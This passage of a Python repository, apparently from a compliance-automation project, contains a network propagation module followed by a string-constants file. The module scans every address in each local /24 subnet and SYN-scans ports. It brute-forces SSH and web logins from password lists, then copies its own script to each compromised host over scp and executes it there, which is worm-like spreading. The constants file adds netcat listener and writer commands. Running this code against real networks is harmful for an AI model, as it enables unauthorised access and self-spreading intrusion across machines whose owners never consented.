14 | # Try to import modules uniquely, otherwise use scapy.all in the meantime
15 | # from scapy.all import *
16 | # Importing sleep to allow network processes time to complete.
17 | from time import sleep
18 | # Importing logging to safely log sensitive, error or debug info.
19 | import logging
20 | # Importing pipes for the piping for certain processes
21 | import pipes
22 | # Importing requests for web based operations.
23 | import requests
24 | # Importing strings for use of the external strings resources.
25 | import autocompliance.src.strings as strings
26 | # Importing strings_functions for string building functions.
27 | import autocompliance.src.strings_functions as strings_functions
28 |
29 |
30 | class NetPropagation:
31 | """
32 | This class deals with net propagation related operations.
33 | """
34 |
35 | def __init__(self, username, password, ip, port, interface, ip_list,
36 | password_list):
37 | """
38 | Object parameters being initialised
39 | :param username: The user we wish to propagate under
40 | :param password: The password being used for propagation
41 | :param ip: The IP address of the target machine
42 | :param port: The port of the target machine
43 | :param interface: The interface on which we wish to carry out actions
44 | :param ip_list: A list of IP addresses on which we wish to carry out
45 | actions
46 | :param password_list: A list of password on which we wish to use for
47 | actions
48 | """
49 | self.username = username
50 | self.password = password
51 | self.ip = ip
52 | self.port = port
53 | self.interface = interface
54 | self.ip_list = ip_list
55 | self.password_list = password_list
56 |
57 | def additional_actions(self, transfer_file, propagation_script, arguments):
58 | """
59 | This function passes the appropriate arguments to and runs the
60 | transferring file and propagating functions, these functions contain
61 | the check to stop them from being run if the appropriate arguments
62 | aren't used
63 | :param transfer_file: The file that will be transferred upon user
64 | request
65 | :param propagation_script: The script that will be propagated upon user
66 | request
67 | :param arguments: Arguments passed in by the user themselves
68 | """
69 | transfer_file.check_transfer_file(arguments, self.ip, self.port,
70 | self.username)
71 | self.propagating(propagation_script, arguments)
72 |
73 | def check_over_ssh(self, filename):
74 | """
75 | This function checks if a given file is already located at the target
76 | machine over SSH. If it is then false is returned and if not then true
77 | is returned. This is needed as a prerequisite to propagating over SSH
78 | :param filename: The filename that we are checking for, can contain a
79 | path
80 | :return True: If the file doesn't exist on the target host or there's a
81 | problem with SSH (assuming file isn't present essentially)
82 | :return False: If the file does exist
83 | """
84 | client = SSHClient()
85 | try:
86 | client.set_missing_host_key_policy(RejectPolicy)
87 | client.connect(hostname=str(self.ip), port=int(self.port),
88 | username=str(self.username), password=str(
89 | self.password), timeout=2)
90 | client.exec_command(pipes.quote(strings_functions.touch_file(
91 | filename)))
92 |
93 | if str(client.exec_command(pipes.quote(strings_functions.cat_file(
94 | filename)))[1]).__len__() < 1:
95 | client.close()
96 | return True
97 |
98 | except NoValidConnectionsError:
99 | client.close()
100 | return True
101 |
102 | except TimeoutError:
103 | client.close()
104 | return True
105 |
106 | except SSHException:
107 | client.close()
108 | return True
109 |
110 | def connect_ssh_client(self):
111 | """
112 | This function checks to see if an SSH connection can be established
113 | and if so then it returns true, if not then it returns false
114 | :return True: If the SSH connect is successful
115 | :return False: If the SSH connect is unsuccessful
116 | """
117 | client = SSHClient()
118 | try:
119 | client.set_missing_host_key_policy(RejectPolicy)
120 | client.connect(hostname=str(self.ip), port=int(self.port),
121 | username=str(self.username), password=str(
122 | self.password), timeout=2)
123 | client.close()
124 | logging.info(strings_functions.connection_status(
125 | strings.SSH, self.ip, self.port, strings.SUCCESSFUL))
126 | return True
127 |
128 | except SSHException:
129 | client.close()
130 | logging.debug(strings_functions.connection_status(
131 | strings.SSH, self.ip, self.port, strings.UNSUCCESSFUL))
132 | return False
133 |
134 | except NoValidConnectionsError:
135 | client.close()
136 | logging.debug(strings_functions.connection_status(
137 | strings.SSH, self.ip, self.port, strings.UNSUCCESSFUL))
138 | return False
139 |
140 | except TimeoutError:
141 | client.close()
142 | logging.debug(strings_functions.connection_status(
143 | strings.SSH, self.ip, self.port, strings.UNSUCCESSFUL))
144 | return False
145 |
146 | def connect_web(self):
147 | """
148 | This function check to see if a web login can be established and if so
149 | then it returns true, if not then it returns false
150 | :return True: If the web login is successful
151 | :return False: If the web login connect is unsuccessful
152 | """
153 | attempt_succeeded = False
154 | try:
155 | self.send_post_request_with_login()
156 | attempt_succeeded = True
157 | except RuntimeError:
158 | logging.debug(strings_functions.connection_status(
159 | strings.WEB, self.ip, self.port, strings.UNSUCCESSFUL))
160 | return attempt_succeeded
161 | except requests.exceptions.ConnectTimeout:
162 | logging.debug(strings_functions.connection_status(
163 | strings.WEB, self.ip, self.port, strings.UNSUCCESSFUL))
164 | return attempt_succeeded
165 | except requests.exceptions.ConnectionError:
166 | logging.debug(strings_functions.connection_status(
167 | strings.WEB, self.ip, self.port, strings.UNSUCCESSFUL))
168 | return attempt_succeeded
169 | if attempt_succeeded:
170 | logging.info(strings_functions.connection_status(
171 | strings.WEB, self.ip, self.port, strings.SUCCESSFUL))
172 | return attempt_succeeded
173 |
174 | def cycle_through_subnet(self):
175 | """
176 | This function takes in a given network interface and an IP list, it
177 | will get the IP address of the interface and add all the address from
178 | its /24 subnet to the IP list.
179 | """
180 | interface_split = get_if_addr(self.interface).split(strings.FULL_STOP)
181 | last_byte = 0
182 | while last_byte < 256:
183 | specific_address = str(interface_split[0]) + strings.FULL_STOP \
184 | + str(interface_split[1]) + strings.FULL_STOP \
185 | + str(interface_split[2]) + strings.FULL_STOP \
186 | + str(last_byte)
187 | if not self.ip_list.__contains__(specific_address):
188 | logging.info(strings_functions.adding_address_to_interface(
189 | specific_address,
190 | self.interface))
191 | if self.ip_list:
192 | self.ip_list.append(specific_address)
193 | else:
194 | self.ip_list = [specific_address]
195 | last_byte = last_byte + 1
196 |
197 | def gathering_local_ips(self):
198 | """
199 | This function will cycle through all local interfaces outside the
200 | loopback interface and will add their /24 subnets to the IP list
201 | :return ip_list: The IP list with the newly found subnet addresses
202 | """
203 | logging.info(strings.FETCHING_LOCAL_INTERFACE_LIST)
204 | local_interfaces = get_if_list()
205 | if strings.LOOPBACK in local_interfaces:
206 | local_interfaces.remove(strings.LOOPBACK)
207 | for interface in local_interfaces:
208 | self.interface = interface
209 | logging.info(strings_functions.fetching_ips_for_interface(
210 | interface))
211 | self.cycle_through_subnet()
212 |
213 | def is_reachable_ip(self):
214 | """
215 | This function checks to see if an IP is reachable and returns true if
216 | it is and false if it isn't
217 | :return True: If the IP address is reachable
218 | :return False: If the IP address is not reachable
219 | """
220 | try:
221 | command = [strings.PING, strings.PING_ARGUMENT, strings.ONE, str(
222 | self.ip)]
223 | if subprocess.call(command) == 0:
224 | logging.info(strings_functions.ip_reachability(self.ip, True))
225 | return True
226 | logging.debug(strings_functions.ip_reachability(self.ip, False))
227 | return False
228 | except FileNotFoundError:
229 | logging.debug(strings.PING_CMD_NOT_FOUND)
230 | return False
231 |
232 | def propagate_script(self, script):
233 | """
234 | This function is responsible for propagating a given script to a
235 | previously accessed machine. It will only run when the user specifies
236 | using the appropriate argument and when the port being used is 22
237 | (SSH), it will also check to ensure the script isn't already present
238 | on the target. It goes about propagating the script in different ways
239 | depending on if an SSH port is specified
240 | :param script: The script to be propagated and ran on another machine
241 | service used
242 | :return True: If the script is successfully propagated here
243 | :return False: If the script is not successfully propagated here
244 | """
245 | try:
246 | if script.file_not_exist(self.ip, self.port, self.username,
247 | self.password):
248 | print(strings.RSA_AND_PROMPT)
249 | os.system(strings_functions.scp_command_string(
250 | self.port, self.username, self.password, os.path.basename(
251 | __file__)))
252 | print(strings.RSA_PROMPT_AGAIN)
253 | os.system(strings_functions.scp_command_string(
254 | self.port, self.username, self.ip, strings.PWDS_LIST))
255 | client = SSHClient()
256 | try:
257 | client.set_missing_host_key_policy(RejectPolicy)
258 | client.connect(hostname=str(self.ip), port=int(self.port),
259 | username=str(self.username),
260 | password=str(self.password), timeout=2)
261 | if strings_functions.run_script_command() == \
262 | "./demo.py -L -p 22 -u " \
263 | "root -f " \
264 | "src/test_files/" \
265 | "passwords_list.txt -P":
266 | client.exec_command(pipes.quote(
267 | strings_functions.run_script_command()))
268 | else:
269 | logging.error(strings.SANITATION_FAILED)
270 | client.close()
271 | return False
272 | return True
273 | except RuntimeError:
274 | client.close()
275 | return False
276 | except TimeoutError:
277 | client.close()
278 | return False
279 | except SSHException:
280 | client.close()
281 | return False
282 |
283 | else:
284 | logging.debug(strings_functions.file_present_on_host(self.ip))
285 | return False
286 | except RuntimeError:
287 | return False
288 | except NoValidConnectionsError:
289 | return False
290 |
291 | def propagating(self, script, arguments):
292 | """
293 | This function attempts propagation of a given script over the network.
294 | If it succeeds we alert the user and let them know what service was
295 | successful. If it is unsuccessful then we let the user know it was
296 | unsuccessful and over what service. Should the user have never asked
297 | for the script to be propagated over the network then we let them know
298 | this part of the process will not be done
299 | :param script: The script that needs to be propagated and spread
300 | :param arguments: The arguments passed in by the user themselves
301 | """
302 | if arguments.propagate and (
303 | self.port == strings.SSH_PORT):
304 | propagated = self.propagate_script(script)
305 | if propagated:
306 | logging.info(strings.SCRIPT_PROPAGATED)
307 | else:
308 | logging.debug(strings.SCRIPT_NOT_PROPAGATED)
309 | else:
310 | logging.info(strings.DO_NOT_PROPAGATE)
311 |
312 | def remove_unreachable_ips(self):
313 | """
314 | This function will try and ping every IP in the IP list and if it
315 | doesn't receive a response it will then remove that IP from the IP list
316 | """
317 | if self.ip_list:
318 | for ip in self.ip_list:
319 | self.ip = ip
320 | logging.info(strings_functions.checking_ip_reachable(ip))
321 | if not self.is_reachable_ip():
322 | self.ip_list.remove(self.ip)
323 |
324 | def scan_port(self):
325 | """
326 | This function will scan a port to see if it is open. If the port is
327 | open then it will return true and if it is not then it will return
328 | false
329 | :return True: The port is open
330 | :return False: The port is not open
331 | """
332 | if isinstance(self.ip, str) and isinstance(self.port, str):
333 | ip_header = IP(dst=self.ip)
334 | tcp_header = TCP(dport=int(self.port), flags=strings.SYN_FLAG)
335 | packet = ip_header / tcp_header
336 | try:
337 | response, unanswered = sr(packet, timeout=2)
338 | # Needed to process the response
339 | sleep(1)
340 | if len(response) > 0:
341 | return True
342 | except PermissionError:
343 | logging.error(strings.PERMISSIONS_ERROR)
344 | return False
345 |
346 | def send_post_request_with_login(self):
347 | """
348 | This function sends a post request to a web server in an attempt to
349 | bruteforce its login details. If it succeeds with the given arguments
350 | then it will return the successful string of details, if not then it
351 | will return Null
352 | """
353 | response = requests.post(strings_functions.web_login_url(
354 | self.ip, self.port),
355 | data={strings.USERNAME_PROMPT_WEB: self.username,
356 | strings.PASSWORD_PROMPT_WEB: self.password},
357 | timeout=2)
358 | if response:
359 | logging.info(strings_functions.connection_status(
360 | strings.WEB, self.ip, self.port, strings.SUCCESSFUL))
361 | return str(self.username) + strings.COLON + str(self.password)
362 | logging.debug(strings_functions.connection_status(
363 | strings.WEB, self.ip, self.port, strings.UNSUCCESSFUL))
364 | return None
365 |
366 | def sign_in_service(self):
367 | """
368 | This function will run through every password in the password list and
369 | will attempt to sign in to the appropriate service with that password.
370 | It will only move on to the next password in the event that the current
371 | password fails in its sign in attempt. If it succeeds then the
372 | successful login details are returned, if not then Null is returned
373 | :return login_details: The username and password to return
374 | :return None: Only done to indicate an unsuccessful task
375 | """
376 | for password in self.password_list:
377 | self.password = password
378 | login_details = self.try_password_for_service()
379 | if login_details is not False:
380 | return login_details
381 | return None
382 |
383 | def try_action(self, transfer_file, script, arguments):
384 | """
385 | This function will attempt a sign in action across various services
386 | depending on the ip or port supplied (if the port is open on that IP),
387 | it iterates through the password list when you sign in to the
388 | appropriate service associated with the port number supplied. If the
389 | sign in action is successful it will then check the need for additional
390 | actions specified by the end user
391 | :param transfer_file: A file to be transferred
392 | :param script: A script to be transferred and executed
393 | :param arguments: List of user specified arguments
394 | """
395 | if self.scan_port():
396 | logging.info(strings.FOUND_OPEN_IP_PORT_PAIR)
397 | action_login_details = self.try_sign_in()
398 | if action_login_details[0]:
399 | self.additional_actions(transfer_file, script, arguments)
400 | else:
401 | logging.debug(strings.CLOSED_IP_PORT_PAIR)
402 |
403 | def try_password_for_service(self):
404 | """
405 | This function tries to log into to a port's associated service using a
406 | specific username and password pair. If it succeeds it returns the
407 | successful login string, otherwise it returns an empty string
408 | :return str(username) + ":" + str(password): The successful username
409 | and password combination
410 | :return "": Empty string for unsuccessful username and password
411 | combination
412 | """
413 | try:
414 | if self.port is strings.SSH_PORT and self.connect_ssh_client():
415 | return str(self.username) + strings.COLON + str(self.password)
416 | if (self.port is strings.WEB_PORT_EIGHTY or self.port is
417 | strings.WEB_PORT_EIGHTY_EIGHTY or self.port is
418 | strings.WEB_PORT_EIGHTY_EIGHT_EIGHTY_EIGHT) and \
419 | self.connect_web():
420 | return str(self.username) + strings.COLON + str(self.password)
421 | return False
422 | except RuntimeError:
423 | return False
424 |
425 | def try_sign_in(self):
426 | """
427 | This function will try to sign in to a specific service depending on
428 | the port supplied. If it gets a successful login then it will return
429 | the login details and the service used, otherwise it returns none as
430 | the login
431 | details along with the service used
432 | :return str(sign_in_details), service: The username and password of a
433 | successful action with the service used
434 | :return None, service: Empty username and password for an unsuccessful
435 | action and the service which was used.
436 | """
437 | service_switch = {
438 | strings.SSH_PORT: strings.SSH_LOWERCASE,
439 | strings.WEB_PORT_EIGHTY: strings.WEB_LOGIN,
440 | strings.WEB_PORT_EIGHTY_EIGHTY: strings.WEB_LOGIN,
441 | strings.WEB_PORT_EIGHTY_EIGHT_EIGHTY_EIGHT: strings.WEB_LOGIN
442 | }
443 | service = service_switch.get(str(self.port))
444 | sign_in_details = self.sign_in_service()
445 | if sign_in_details:
446 | logging.info(strings_functions.working_username_password(service))
447 | return str(sign_in_details), service
448 | logging.debug(strings.IMPOSSIBLE_ACTION)
449 | return None, service
450 |
--------------------------------------------------------------------------------
/autocompliance/src/strings.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Author: @andrewk10
4 |
5 | # A string that just states "Adding".
6 | ADDING = "Adding"
7 |
8 | # Admin user string.
9 | ADMIN = "admin"
10 |
11 | # All ports list, for utilising all services in the scripts.
12 | ALL_PORTS = "22,23,25,80"
13 |
14 | # Just a little arrow for CLI output.
15 | ARROW = "->"
16 |
17 | # Prompt to let people know arguments are being assigned for testing.
18 | ASSIGNING_ARGUMENTS = "Assigning arguments as part of test"
19 |
20 | # Just the '@' symbol
21 | AT_SYMBOL = "@"
22 |
23 | # String to describe the username argument under help
24 | A_USERNAME = "A username"
25 |
26 | # Blank String
27 | BLANK_STRING = ''
28 |
29 | # Letting the user know we can't read an IP list from a specific file.
30 | CAN_NOT_READ_IP_LIST = "IP list cannot be read from filename:"
31 |
32 | # cat command
33 | CAT = "cat"
34 |
35 | # Let the user know there's something wrong with the file paths provided.
36 | CHECK_FILE_PATHS = "There's something wrong with the file paths provided, " \
37 | "please review them and try again."
38 |
39 | # A string that states that the IP and port pair is closed.
40 | CLOSED_IP_PORT_PAIR = "This IP address and port pair is closed"
41 |
42 | # A string that just denotes the use of a colon, same "idea" as above.
43 | COLON = ":"
44 |
45 | # A string that just denotes the use of a comma, same "idea" as above.
46 | COMMA = ","
47 |
48 | # The consensus message for requesting a change of the current view.
49 | CONSENSUS_MESSAGE_CHANGE_VIEW_REQUEST = "Change View Request"
50 |
51 | # The consensus message that commits the consensus changes.
52 | CONSENSUS_MESSAGE_COMMIT = "Commit"
53 |
54 | # The consensus message that asks for the preparing of a consensus request.
55 | CONSENSUS_MESSAGE_PREPARE_REQUEST = "Prepare Request"
56 |
57 | # The consensus message that asks for the preparing of a consensus response.
58 | CONSENSUS_MESSAGE_PREPARE_RESPONSE = "Prepare Response"
59 |
60 | # The consensus message that asks for the preparing of a consensus recovery
61 | # request.
62 | CONSENSUS_MESSAGE_RECOVERY_MESSAGE = "Recovery Message"
63 |
64 | # The consensus message that asks for the preparing of a consensus recovery
65 | # request.
66 | CONSENSUS_MESSAGE_RECOVERY_REQUEST = "Recovery Request"
67 |
68 | # The demo filename
69 | DEMO_SCRIPT_FILENAME = "demo.py"
70 |
71 | # The demo script path.
72 | DEMO_SCRIPT_PATH = "./demo.py"
73 |
74 | # This is the program description for the cli help menu.
75 | DESCRIPTION = "Automating the Implementation of a " \
76 | "Cybersecurity Governance, Risk and " \
77 | "Compliance Programme using Distributed " \
78 | "Ledger Technologies"
79 |
80 | # A string that states a script wasn't propagated.
81 | DO_NOT_PROPAGATE = "Requirement to propagate script not specified, skipping..."
82 |
83 | # A string that states a file wasn't transferred.
84 | DO_NOT_TRANSFER = "Requirement to transfer file not specified, skipping..."
85 |
86 | # Just three dots at the end of a sentence.
87 | ELLIPSES = "..."
88 |
89 | # A string for specifying encoding for ascii.
90 | ENCODE_ASCII = "ascii"
91 |
92 | # A string which specifically states something is example usage.
93 | EXAMPLE_USAGE = "Example usage:"
94 |
95 | # An exiting prompt.
96 | EXITING = "Exiting..."
97 |
98 | # Prompts the user that values couldn't be assigned
99 | FAILED_ASSIGNING_VALUES = "Failed assigning values (maybe null)"
100 |
101 | # Fetching IP for a given interface message
102 | FETCHING_INTERFACE_IPS = "Fetching IPs for interface"
103 |
104 | # Prompts the user that their fetching the local interface list.
105 | FETCHING_LOCAL_INTERFACE_LIST = "Fetching local interface list..."
106 |
107 | # Name of the test text file, prepended with autocompliance/src/ for Pytest to
108 | # work.
109 | FILE = "autocompliance/src/test_files/file.txt"
110 |
111 | # Lets the user know a file doesn't exist.
112 | FILE_DOES_NOT_EXIST = "A specified file does not exist"
113 |
114 | # Lets the user know that a file is present on the host.
115 | FILE_PRESENT_ON_HOST = "A file is already present on this host:"
116 |
117 | # String for the help output.
118 | FILENAME_LIST_IP_ADDRESSES = "Filename for a file containing a list of " \
119 | "target IP addresses"
120 |
121 | # String for forcing a fail for tests.
122 | FORCE_FAIL = "This Should Work"
123 |
124 | # Lets the user know there's an open port on a specific IP address.
125 | FOUND_OPEN_IP_PORT_PAIR = "Found an open IP address and port pair"
126 |
127 | # Just simply says "from interface"
128 | FROM_INTERFACE = "from interface"
129 |
130 | # Full stop string, memory saving again, reducing redundant assigns.
131 | FULL_STOP = "."
132 |
133 | # There's a problem with parsing a file with a given filename.
134 | FILENAME_PROCESSING_ERROR = "One of the filenames are invalid"
135 |
136 | # String for defining the passwords filename argument under help.
137 | FILENAME_PWS_FILE = "Filename for a file containing a list of passwords"
138 |
139 | # Greater than symbol.
140 | GREATER_THAN = ">"
141 |
142 | # Help text for... the help.
143 | HELP_HELP = "Guidance regarding how to utilise the demo back-end"
144 |
145 | # Short option name for help.
146 | HELP_OPT_SHORT = "-h"
147 |
148 | # Option name for help.
149 | HELP_OPT_LONG = "--help"
150 |
151 | # The help string for the propagation argument definition in help output.
152 | HELP_STRING_PROPAGATION = "Propagates the script onto available devices and " \
153 | "executes the script using the given command"
154 |
155 | # Home directory string.
156 | HOME_DIR = ":~/"
157 |
158 | # HTTPS String for start of URLs.
159 | HTTPS_STRING = "https://"
160 |
161 | # Letting the user know a propagation action had failed.
162 | IMPOSSIBLE_ACTION = "It was impossible to bruteforce this IP address and port"
163 |
164 | # Specifying that something is from an interface's subnet.
165 | INTERFACE_SUBNET = "'s subnet."
166 |
167 | # Help text for the target IP option.
168 | IP_FILE_HELP = "Filename for a file containing a list of target IP " \
169 | "addresses"
170 |
171 | # Short option name for the target IP option.
172 | IP_FILE_OPT_SHORT = "-t"
173 |
174 | # Option name for the target IP option.
175 | IP_FILE_OPT_LONG = "--target"
176 |
177 | # Letting the user know a specified IP file could not be found.
178 | IP_FILENAME_NOT_FOUND = "Could not find the specified IP file"
179 |
180 | # Name of the test IP list file, prepended with autocompliance/src/ for Pytest
181 | # to work.
182 | IP_LIST = "autocompliance/src/test_files/ip_list.txt"
183 |
184 | # Name of the short test IP list file, prepended with autocompliance/src/ for
185 | # Pytest to work.
186 | IP_LIST_SHORT = "autocompliance/src/test_files/ip_list_short.txt"
187 |
188 | # Let the user know that we're checking to see if the IP address is reachable.
189 | IS_IP_REACHABLE = "Checking if the following ip address is reachable:"
190 |
191 | # Help text for the LAN scan option.
192 | LAN_HELP = "Scans the lan across all interfaces and " \
193 | "creates/adds to the list of target IP addresses"
194 |
195 | # Short option name for the LAN scan option.
196 | LAN_OPT_SHORT = "-L"
197 |
198 | # Option name for the LAN scan option.
199 | LAN_OPT_LONG = "--lan"
200 |
201 | # The less than symbol.
202 | LESS_THAN = "<"
203 |
204 | # Lines to check from the test file.
205 | LINES = ["Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed "
206 | "do eiusmod tempor", "incididunt ut labore et dolore magna "
207 | "aliqua. Ut enim ad minim veniam, quis",
208 | "nostrud exercitation ullamco laboris nisi ut aliquip ex ea "
209 | "commodo consequat.", "Duis aute irure dolor in reprehenderit "
210 | "in voluptate velit esse cillum dolore",
211 | "eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non"
212 | " proident, sunt", "in culpa qui officia deserunt mollit anim id"
213 | " est laborum."]
214 |
215 | # The string that defines the local scan argument in the help output.
216 | LOCAL_SCAN_STRING_HELP = "Scans the lan across all interfaces and " \
217 | "creates/adds to the list of target IP addresses"
218 |
219 | # Login PHP string, generally used with web logins.
220 | LOGIN_PHP = "/login.php"
221 |
222 | # The login prompt a user usually sees with SSH.
223 | LOGIN_PROMPT = "login:"
224 |
225 | # "Login to" string, another string building constant.
226 | LOGIN_TO = "login to"
227 |
228 | # The typical ID of the loopback interface.
229 | LOOPBACK = "lo"
230 |
231 | # The typical ID of the loopback interface.
232 | LOOPBACK_IP = "127.0.0.1"
233 |
234 | # The typical IP of the loopback interface as a list for testing.
235 | LOOPBACK_IP_AS_LIST = ["127.0.0.1"]
236 |
237 | # The typical IP of the loopback interface as a list for testing, second
238 | # iteration as the first iteration on the full run of the test suite breaks?
239 | # Weird.
240 | LOOPBACK_IP_AS_LIST_REMOVE = ["127.0.0.1"]
241 |
242 | # The typical IP of the loopback interface as a list for testing.
243 | LOOPBACK_AND_FAIL_IP_AS_LIST = ["127.0.0.1", "10.255.255.254"]
244 |
245 | # The main script.
246 | MAIN_SCRIPT = "./main.py"
247 |
248 | # The main function call.
249 | MAIN = "main()"
250 |
251 | # A string to let the user know a necessary argument is missing.
252 | MISSING_ARGUMENT = "Missing a mandatory argument, ensure arguments are used " \
253 | "correctly"
254 |
255 | # Netcat listener, with a specified port, the command.
256 | NETCAT_LISTENER_PORT_COMMAND = "nc -l -p"
257 |
258 | # Netcat writer with a 3-second timeout time, command.
259 | NETCAT_WRITER_COMMAND = "nc -w 3"
260 |
261 | # The name of the net propagation script, prepended with autocompliance/src/
262 | # for tests to work.
263 | NET_PROPAGATION = "autocompliance/src/net_propagation.py"
264 |
265 | # Newline character, mostly used to mimic an enter key press.
266 | NEWLINE = "\n"
267 |
268 | # Two newline and tab special characters.
269 | NEWLINE_NEWLINE_TAB = "\n\n\t"
270 |
271 | # The newline and tab special characters.
272 | NEWLINE_TAB = "\n\t"
273 |
274 | # Just the numerical form of the number one, again, memory preservation.
275 | ONE = "1"
276 |
277 | # Password prompt for SSH.
278 | PASSWORD_PROMPT = "Password:"
279 |
280 | # Password prompt for web logins, rather the post ID really.
281 | PASSWORD_PROMPT_WEB = "password:"
282 |
283 | # Permissions error, advise the user that superuser permissions are needed for
284 | # scan_port.
285 | PERMISSIONS_ERROR = "Superuser permissions or admin privileges are needed " \
286 | "for the scanning of ports"
287 |
288 | # Short option name for the password file option.
289 | PW_FILE_OPT_SHORT = "-f"
290 |
291 | # Option name for the password file option.
292 | PW_FILE_OPT_LONG = "--file"
293 |
294 | # Help text for the password file option.
295 | PW_FILE_HELP = "Filename for a file containing a list of passwords"
296 |
297 | # List of dummy passwords, prepended with autocompliance/src/
298 | PWDS_LIST = "autocompliance/src/test_files/passwords_list.txt"
299 |
300 | # Shorter list of dummy passwords, prepended with autocompliance/src/
301 | PWDS_LIST_SHORT = "autocompliance/src/test_files/passwords_list_short.txt"
302 |
303 | # Parameters string for help test.
304 | PARAMETERS = "Parameters:"
305 |
306 | # Parameters were used incorrectly, so we're telling the user what to do.
307 | PARAMETER_MISUSE = "Parameter misuse, check help text below"
308 |
309 | # Letting the user know we're performing a local scan.
310 | PERFORMING_LOCAL_SCAN = "Performing local scan, this might take a while so " \
311 | "grab a coffee..."
312 |
313 | # The ping command.
314 | PING = "ping"
315 |
316 | # The argument for ping which specifies the number of packets sent.
317 | PING_ARGUMENT = "-c"
318 |
319 | # The error for when the ping command can not be tested, so instead we must
320 | # default to removing an IP address
321 | PING_CMD_NOT_FOUND = "The ping command is not available, defaulting to " \
322 | "removing IP"
323 |
324 | # Short option name for the port option.
325 | PORT_OPT_SHORT = "-p"
326 |
327 | # Option name for the port option.
328 | PORT_OPT_LONG = "--port"
329 |
330 | # Help text for the port option.
331 | PORT_HELP = "Ports to scan on the target host"
332 |
333 | # String for the help text.
334 | PORTS_TO_SCAN = "Ports to scan on the target host"
335 |
336 | # Help text for the propagate option.
337 | PROP_HELP = "Propagates the script onto available devices " \
338 | "and executes the script using the given command"
339 |
340 | # Option name for the propagate option.
341 | PROP_OPT_LONG = "--propagate"
342 |
343 | # Short option name for the propagate option.
344 | PROP_OPT_SHORT = "-P"
345 |
346 | # Help text for the propagate option.
347 | PROP_FILE_HELP = "Propagates the provided file onto available devices"
348 |
349 | # Option name for propagate a file option.
350 | PROP_FILE_OPT_LONG = "--deliver"
351 |
352 | # Short option name for propagate a file option.
353 | PROP_FILE_OPT_SHORT = "-d"
354 |
355 | # A string just for tests.
356 | RANDOM_STRING = "tests"
357 |
358 | # Root user string.
359 | ROOT = "root"
360 |
361 | # RSA specific password prompt.
362 | RSA_AND_PROMPT = "Please type in this password below and say yes to any " \
363 | "RSA key prompts: "
364 |
365 | # A different password prompt following the previous one.
366 | RSA_PROMPT_AGAIN = "Please type in this password again: "
367 |
368 | # The error when an SSH command has been tampered with.
369 | SANITATION_FAILED = "SSH command did not pass sanitation checks"
370 |
371 | # SCP Command String.
372 | SCP_COMMAND = "scp -P"
373 |
374 | # Specifies that the script has been propagated over a port (use debug for
375 | # specific port number).
376 | SCRIPT_PROPAGATED = "Script propagated over this port"
377 |
378 | # Specifies that the script hasn't been propagated over a port.
379 | SCRIPT_NOT_PROPAGATED = "Script couldn't be propagated over this port"
380 |
381 | # Just a space, yep, really.
382 | SPACE = " "
383 |
384 | # Just an SSH strings, memory saving measures again.
385 | SSH = "SSH"
386 |
387 | # Same as above just lowercase, needed in some instances.
388 | SSH_LOWERCASE = "ssh"
389 |
390 | # The default port for SSH.
391 | SSH_PORT = "22"
392 |
393 | # Station an action was successful.
394 | SUCCESSFUL = "Successful"
395 |
396 | # The syn flag for packet crafting in Scapy
397 | SYN_FLAG = "S"
398 |
399 | # Test IP address.
400 | TEST_IP = "192.168.1.1"
401 |
402 | # Test IP address which should fail.
403 | TEST_IP_FAIL = "10.255.255.254"
404 |
405 | # A list of IPs for testing subnet scanning.
406 | TEST_IP_LIST = ['127.0.0.1', '127.0.0.0', '127.0.0.2', '127.0.0.3',
407 | '127.0.0.4', '127.0.0.5', '127.0.0.6', '127.0.0.7',
408 | '127.0.0.8', '127.0.0.9', '127.0.0.10', '127.0.0.11',
409 | '127.0.0.12', '127.0.0.13', '127.0.0.14', '127.0.0.15',
410 | '127.0.0.16', '127.0.0.17', '127.0.0.18', '127.0.0.19',
411 | '127.0.0.20', '127.0.0.21', '127.0.0.22', '127.0.0.23',
412 | '127.0.0.24', '127.0.0.25', '127.0.0.26', '127.0.0.27',
413 | '127.0.0.28', '127.0.0.29', '127.0.0.30', '127.0.0.31',
414 | '127.0.0.32', '127.0.0.33', '127.0.0.34', '127.0.0.35',
415 | '127.0.0.36', '127.0.0.37', '127.0.0.38', '127.0.0.39',
416 | '127.0.0.40', '127.0.0.41', '127.0.0.42', '127.0.0.43',
417 | '127.0.0.44', '127.0.0.45', '127.0.0.46', '127.0.0.47',
418 | '127.0.0.48', '127.0.0.49', '127.0.0.50', '127.0.0.51',
419 | '127.0.0.52', '127.0.0.53', '127.0.0.54', '127.0.0.55',
420 | '127.0.0.56', '127.0.0.57', '127.0.0.58', '127.0.0.59',
421 | '127.0.0.60', '127.0.0.61', '127.0.0.62', '127.0.0.63',
422 | '127.0.0.64', '127.0.0.65', '127.0.0.66', '127.0.0.67',
423 | '127.0.0.68', '127.0.0.69', '127.0.0.70', '127.0.0.71',
424 | '127.0.0.72', '127.0.0.73', '127.0.0.74', '127.0.0.75',
425 | '127.0.0.76', '127.0.0.77', '127.0.0.78', '127.0.0.79',
426 | '127.0.0.80', '127.0.0.81', '127.0.0.82', '127.0.0.83',
427 | '127.0.0.84', '127.0.0.85', '127.0.0.86', '127.0.0.87',
428 | '127.0.0.88', '127.0.0.89', '127.0.0.90', '127.0.0.91',
429 | '127.0.0.92', '127.0.0.93', '127.0.0.94', '127.0.0.95',
430 | '127.0.0.96', '127.0.0.97', '127.0.0.98', '127.0.0.99',
431 | '127.0.0.100', '127.0.0.101', '127.0.0.102', '127.0.0.103',
432 | '127.0.0.104', '127.0.0.105', '127.0.0.106', '127.0.0.107',
433 | '127.0.0.108', '127.0.0.109', '127.0.0.110', '127.0.0.111',
434 | '127.0.0.112', '127.0.0.113', '127.0.0.114', '127.0.0.115',
435 | '127.0.0.116', '127.0.0.117', '127.0.0.118', '127.0.0.119',
436 | '127.0.0.120', '127.0.0.121', '127.0.0.122', '127.0.0.123',
437 | '127.0.0.124', '127.0.0.125', '127.0.0.126', '127.0.0.127',
438 | '127.0.0.128', '127.0.0.129', '127.0.0.130', '127.0.0.131',
439 | '127.0.0.132', '127.0.0.133', '127.0.0.134', '127.0.0.135',
440 | '127.0.0.136', '127.0.0.137', '127.0.0.138', '127.0.0.139',
441 | '127.0.0.140', '127.0.0.141', '127.0.0.142', '127.0.0.143',
442 | '127.0.0.144', '127.0.0.145', '127.0.0.146', '127.0.0.147',
443 | '127.0.0.148', '127.0.0.149', '127.0.0.150', '127.0.0.151',
444 | '127.0.0.152', '127.0.0.153', '127.0.0.154', '127.0.0.155',
